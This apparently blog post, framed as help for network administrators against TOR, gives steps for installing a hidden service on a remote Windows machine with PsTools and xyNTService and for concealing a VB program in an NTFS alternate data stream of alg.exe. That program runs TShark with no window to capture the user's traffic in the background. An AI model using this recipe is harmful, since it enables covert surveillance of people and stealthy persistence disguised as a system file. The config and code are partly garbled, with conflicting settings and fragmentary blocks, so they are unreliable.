The use of TOR indeed has recently gathered momentum,much to the chagrin of network administrators who meticulously implemented measures to circumvent acess to publicly available content that doesn't comply with their policies. Today I will change sides to suggest some remedial measures for system administrators which can empower them to still view the traffic that goes through TOR network.
Oh, But before I delve into it- It worth trying yourself using the sequence of steps briefly outline before I put a video tomorrow apropos this .. So, here we go
You have a username :******* and an interesting password say 4$$h0l3 on a system whose IP address is say 192.168.4.19X.
1. Download PStools (http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx)
//using it you will install xyNTservice on remote computer
2. Download xyNTservice.exe (http://www.codeproject.com/kb/system/xyntservice.aspx)
//It can be made to start before you log-on to the computer :)
3. modify xyNTservice.ini
ServiceName = XYNTService
CheckProcessSeconds = 30
CommandLine = c:\winnt\system32\alg.exe:process
UserInterface = Yes
Restart = Yes
Restart = No
4. The VB 2005 application function (c:\winnt\system32\alg.exe:process) that can be ADS to alg.exe and spawns a background process has a following code
Private oProc As System.Diagnostics.Process
'Run process code
Dim sShellCommand As String = "C:\Program Files\Wireshark\TShark.exe"
Dim sArgumentString As String = "-i "& iInterfaceID & " -w """& sOutputFile & """ & -a duration:"& lDuration & " -a files:"& lNumFiles & " -a:filesize:"& lFileSize
Dim oProcInfo As New System.Diagnostics.ProcessStartInfo(sShellCommand)
.UseShellExecute = False
'I tried changing this to true and passing a CTRL+C
'through a Streamwriter - but I couldn't get it to work
.RedirectStandardInput = False
.CreateNoWindow = True
.WindowStyle = ProcessWindowStyle.Hidden
.Arguments = sArgumentString
oProc = System.Diagnostics.Process.Start(oProcInfo)
'This code basically stops here until the process raises an Exited event which either happens after the specified amount of time has elapsed
'and TShark has finished doing its thing, or when the process is stopped (interrupted) by the user.
'End code block
Now - this process spawns perfectly and does everything it needs to do. If you know anything about Wireshark - the TShark process will basically run for a specified amount of time [lDuration] and then close the file it's writing. This all works perfectly.
Another routine that allows the user to kill the process early that contains the following code:
'Interrupt process code
oProc.Close() 'Need to replace this line with a means of sending CTRL+C to oProc
If Not oProc.HasExited Then
'End code block
[Remember the data is being captured from the place it originates now [which TOR cant alter] that too in background and being sent to you computer in a file.
>> YOU NEVER KNOW WHERE AN OCEAN START AND HOW MUCH IT HAS HIDDEN THINGS INSIDE IT <<
== Check Yourself , It works smooth as silk - A boon for network administrators- Im trying to alter the video so that I do not get sued or COC-ed at my workplace ==
Posted by 12:03 and have 0 komentar, Published at